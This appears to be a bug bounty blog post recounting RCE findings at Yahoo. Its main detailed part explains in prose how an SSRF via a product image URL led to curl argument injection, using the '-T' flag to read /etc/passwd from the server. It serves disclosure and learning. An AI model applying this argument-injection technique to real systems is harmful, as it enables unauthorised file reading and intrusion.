How I found 2.9 RCE at Yahoo! Bug Bounty program

Foreword

The Yahoo’s Bug Bounty program include a lot of services and I decided to work around Brightroll.

First RCE

I started with the regular thing when you do bug hunting, it’s reconnaissance. I do nothing irregular: Google, Aquatone etc…

Queue list
Message lists
Strage form
Window like terminal
Brightroll RCE

Second RCE

Actually, it was the RCE via the same service that was in previous RCE.

Third ALMOST RCE

This vulnerability is the most interesting of all my finds. So, I started my research of yahoosmallbusiness store after creating a few products to have access to functions related with it. While I was discovering a functional I noticed that when I visit email templates page ajax send a few requests to get path to the images of products that showed on the page. One of the requests was sended to objinfo_data.php with parameter id. As I thounght this script was used to resize products image. So, this part is important. When I was creating a products I notice that request that used to create product containt a couple of urls to image but not directly binary image data. My suggestion was that: “What if the script get the link of product image and use it to resize.”. I thought it’s may be SSRF. I edited the product, changed image url to my host and port and runned netcat. After that I use product id of this product in request to objinfo_data.php. Netcat showed me the request and I noticed that User-Agent was Curl. After that I tried to get RCE any possible ways, but have no results:( It just wasn’t working. After all my torment’s I decide to ask my collegues about it. One of them offered to try to use “-A something” and if I will see “User-Agent: something” in the request in netcat it’s possble to injection to argument string. I tried and it worked! After that another my collegue immediately offer to me use flag -T. This flag get file from file system and attach it to request. I used it and was able to read /etc/passwd.

Yahoo Small Business curl argument injection.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store